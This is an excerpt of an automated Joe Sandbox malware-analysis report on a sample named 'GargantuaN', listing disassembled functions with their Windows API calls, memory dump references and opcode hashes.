                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: GdiplusShutdownUninitialize
                                                        • String ID:
                                                        • API String ID: 3856339756-0
                                                        • Opcode ID: 9b397629d2386404bb2d662cb563c25bd946192f273be1c4719137cb61434f92
                                                        • Instruction ID: ea404bcac40fc5ece7bbd9baf9dac85acdc4b86ffa31e38f26d5c47b94d2de2c
                                                        • Opcode Fuzzy Hash: 9b397629d2386404bb2d662cb563c25bd946192f273be1c4719137cb61434f92
                                                        • Instruction Fuzzy Hash: 27E03972604650EFCA01AB5CDC06B49FBA9FB88B20F00426AA416D37A0CB74A800CAA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00D5A23A,?,00D5755C,?,?,?,?), ref: 00D5A254
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D5A23A,?,00D5755C,?,?,?,?), ref: 00D5A280
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile$_wcslen
                                                        • String ID:
                                                        • API String ID: 2673547680-0
                                                        • Opcode ID: 110860b966effc5b5aa632c38b3e84d3e9c4128abb564195215ca4e1cb5110c7
                                                        • Instruction ID: 97533008747123d4941170d883b9eecf8dbf80c0a7ee271213ed85883ab72fdb
                                                        • Opcode Fuzzy Hash: 110860b966effc5b5aa632c38b3e84d3e9c4128abb564195215ca4e1cb5110c7
                                                        • Instruction Fuzzy Hash: 7AE06D355002285BCF10AB68CC05BDD7B58AB087E2F044261BD48E7290D6709E488AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D6DEEC
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00D6DF03
                                                          • Part of subcall function 00D6B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                          • Part of subcall function 00D6B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                          • Part of subcall function 00D6B568: IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                          • Part of subcall function 00D6B568: TranslateMessage.USER32(?), ref: 00D6B5AC
                                                          • Part of subcall function 00D6B568: DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                        • String ID:
                                                        • API String ID: 2718869927-0
                                                        • Opcode ID: f50249bf15cb46935f078ee367cc422a8f6cd0359799932e525bc34a208b6fee
                                                        • Instruction ID: 85d80a92d09fb9c05f13ade361584e4dfbb7ad4cf5e1e00bc8ee7a5979d72210
                                                        • Opcode Fuzzy Hash: f50249bf15cb46935f078ee367cc422a8f6cd0359799932e525bc34a208b6fee
                                                        • Instruction Fuzzy Hash: 4DE09B7640434866DF01A764DC06FDE376C9F057C5F040852B601D71B2E974D6549772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystem
                                                        • String ID:
                                                        • API String ID: 1175261203-0
                                                        • Opcode ID: 18d246545349eb22e91999c5f1c0dfb2621323f491da9bbda120b69436e66360
                                                        • Instruction ID: be3b566de8527d9b4a567871b241fd377a429d172d841c0151724b33341bfca9
                                                        • Opcode Fuzzy Hash: 18d246545349eb22e91999c5f1c0dfb2621323f491da9bbda120b69436e66360
                                                        • Instruction Fuzzy Hash: 07E048764102586BDF11AB94DC05FDB7BACEF097D1F0400657A49D2104E674DA84CBF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D6A3DA
                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D6A3E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: BitmapCreateFromGdipStream
                                                        • String ID:
                                                        • API String ID: 1918208029-0
                                                        • Opcode ID: 511e6508b725c6d1a18de41e92d339a27222214aae5a383e1810fcf25d2a22c2
                                                        • Instruction ID: 0eb1ed956be79c1796a53e867dcd853877df6f190c772edf370c1087ee7a2906
                                                        • Opcode Fuzzy Hash: 511e6508b725c6d1a18de41e92d339a27222214aae5a383e1810fcf25d2a22c2
                                                        • Instruction Fuzzy Hash: 3DE0ED75500218EFCB10DF99C941A99BBE8EB04360F10805AA896A3301E374AE04DFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D72B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D72BAA
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D72BB5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                        • String ID:
                                                        • API String ID: 1660781231-0
                                                        • Opcode ID: 6a80a5bfeb9645aebd49213c2178108b4e1c30d7fe7483431d6ac10bbbd71d7c
                                                        • Instruction ID: 2aee778a7928ed357a8b19036a50221b43712ec5c3dca2d8864c901b6ee09b20
                                                        • Opcode Fuzzy Hash: 6a80a5bfeb9645aebd49213c2178108b4e1c30d7fe7483431d6ac10bbbd71d7c
                                                        • Instruction Fuzzy Hash: 34D022352643801C4E243E702C034BA3355EE82B707F0D29AF02CC58CDFF109048B231
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D512F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemShowWindow
                                                        • String ID:
                                                        • API String ID: 3351165006-0
                                                        • Opcode ID: 346871765eba561b0b35491958c567a75de567813b69ff3544ab1f6e452691fd
                                                        • Instruction ID: d5a71f7236fc0d42c94448f3764ebce5c16913b3b5162a563d4055e2f6c8e4b0
                                                        • Opcode Fuzzy Hash: 346871765eba561b0b35491958c567a75de567813b69ff3544ab1f6e452691fd
                                                        • Instruction Fuzzy Hash: 4EC0123205C300FECB010BB8DC09C2FBBACABA5312F04CA08F0A5C0260C238C120EB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D51A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 0a20f87e75dfe1ec8a2e462fd64e32c1dc24c30807ecdd2eeca817844c060751
                                                        • Instruction ID: 6df20726383d46db5681b45730b934f1553485ed936ca48543a88a6041bc9200
                                                        • Opcode Fuzzy Hash: 0a20f87e75dfe1ec8a2e462fd64e32c1dc24c30807ecdd2eeca817844c060751
                                                        • Instruction Fuzzy Hash: D9C1B078A00254AFEF15CF68C484BB97BA5EF16311F0801BAEC45DB392DB319948CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D53BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 5d3cb039f86c86fd4c2be105b00e086f147b0d288c32fadbcad03408e71a996d
                                                        • Instruction ID: 380cc4f6a303a39081de2e0249b26732b00b149193eae3c441bec208019e1bf0
                                                        • Opcode Fuzzy Hash: 5d3cb039f86c86fd4c2be105b00e086f147b0d288c32fadbcad03408e71a996d
                                                        • Instruction Fuzzy Hash: 9F71A071500B449EDF25DB74C8519EBB7E9EB14342F44092EFDAB87241EA326688DF31
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D58284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D58289
                                                          • Part of subcall function 00D513DC: __EH_prolog.LIBCMT ref: 00D513E1
                                                          • Part of subcall function 00D5A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A598
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$CloseFind
                                                        • String ID:
                                                        • API String ID: 2506663941-0
                                                        • Opcode ID: a3584f1164082747d3743392f804fb654745f6538ef21d542c4848a6a68e1411
                                                        • Instruction ID: 9a74a88439fb4d27a6a72535dae2cb76336cc4865c3576209ce692dffc80069f
                                                        • Opcode Fuzzy Hash: a3584f1164082747d3743392f804fb654745f6538ef21d542c4848a6a68e1411
                                                        • Instruction Fuzzy Hash: D341A7759446589ADF20DB60CC55BEAB778EF00305F4404EAEC8AA7092EB755ECCDB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D513E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D513E1
                                                          • Part of subcall function 00D55E37: __EH_prolog.LIBCMT ref: 00D55E3C
                                                          • Part of subcall function 00D5CE40: __EH_prolog.LIBCMT ref: 00D5CE45
                                                          • Part of subcall function 00D5B505: __EH_prolog.LIBCMT ref: 00D5B50A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: a6cf97421971a09143ab13f6bdfde2d4655bfdada2b0bf7717af9df77494371b
                                                        • Instruction ID: 302bd61277719c15d411e8fb8981ffc21578c744d9507716202dab4874691fb2
                                                        • Opcode Fuzzy Hash: a6cf97421971a09143ab13f6bdfde2d4655bfdada2b0bf7717af9df77494371b
                                                        • Instruction Fuzzy Hash: 7B413EB0905B409ED724DF798885AE6FBE5FF19310F504A2ED9FE83242DB716658CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D513DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D513E1
                                                          • Part of subcall function 00D55E37: __EH_prolog.LIBCMT ref: 00D55E3C
                                                          • Part of subcall function 00D5CE40: __EH_prolog.LIBCMT ref: 00D5CE45
                                                          • Part of subcall function 00D5B505: __EH_prolog.LIBCMT ref: 00D5B50A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 07595720aa5a60b46ba778a3cd34b7dfa0dc0d51bda77277bd14dd731e605d3a
                                                        • Instruction ID: b0f8317f9b85c481786ebe6b51ae3e056f6cd81575a54ded8fdd1ef6e35f8d1f
                                                        • Opcode Fuzzy Hash: 07595720aa5a60b46ba778a3cd34b7dfa0dc0d51bda77277bd14dd731e605d3a
                                                        • Instruction Fuzzy Hash: 77413EB0905B409ED724DF798885AE6FBE5FF19310F50492ED9FE83241DB716654CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D6B098
                                                          • Part of subcall function 00D513DC: __EH_prolog.LIBCMT ref: 00D513E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: c60cb7c5de35ccd60f0ce8ad9691fb90fa0ca5e0edd9dc542cb7b64e774d005b
                                                        • Instruction ID: de38c0356202a30e6a8a2443432d65e20e2139f8a4f3afa087eadb766f0b3c71
                                                        • Opcode Fuzzy Hash: c60cb7c5de35ccd60f0ce8ad9691fb90fa0ca5e0edd9dc542cb7b64e774d005b
                                                        • Instruction Fuzzy Hash: 8F314D75804249AFCF15DF64C951AEEBBB4EF05314F14449EE809B7242D739AE48CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00D7ACF8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 4dd38f5b6d0dd563fbabf19d8d55219be27e683e91052c9c11aed90fa1259cfd
                                                        • Instruction ID: 7eebcedf8268d398af6d331af8829aa7098113b3614e4ce299f1395ab2b0dafd
                                                        • Opcode Fuzzy Hash: 4dd38f5b6d0dd563fbabf19d8d55219be27e683e91052c9c11aed90fa1259cfd
                                                        • Instruction Fuzzy Hash: 2011E737A00225AF9B329E1DDC5089E7395EBC432071AC220EC59EB354F630DC018BF2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 26c571a90e210984256b7a7d26f1a3d4ff4c558796dda180342c1003bffce405
                                                        • Instruction ID: e90bcc2b504dedab6feacd55104bc26a6bbf8e9c292cecccc77dc8bef8cae7d4
                                                        • Opcode Fuzzy Hash: 26c571a90e210984256b7a7d26f1a3d4ff4c558796dda180342c1003bffce405
                                                        • Instruction Fuzzy Hash: 0D015277900528EBCF21ABA8CD919DEB776EF88751F054515EC16BB252DA348D0886B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D7B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D79813,00000001,00000364,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D7B177
                                                        • _free.LIBCMT ref: 00D7C4E5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                        • Instruction ID: c0b57b45989b2208db419dbf3f00470da841d5207bd97de2b1d43c517caf0f12
                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                        • Instruction Fuzzy Hash: B901D6722103056FE3318E699885A6AFBE9EB85374F65451EE59883281FA30A905C774
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
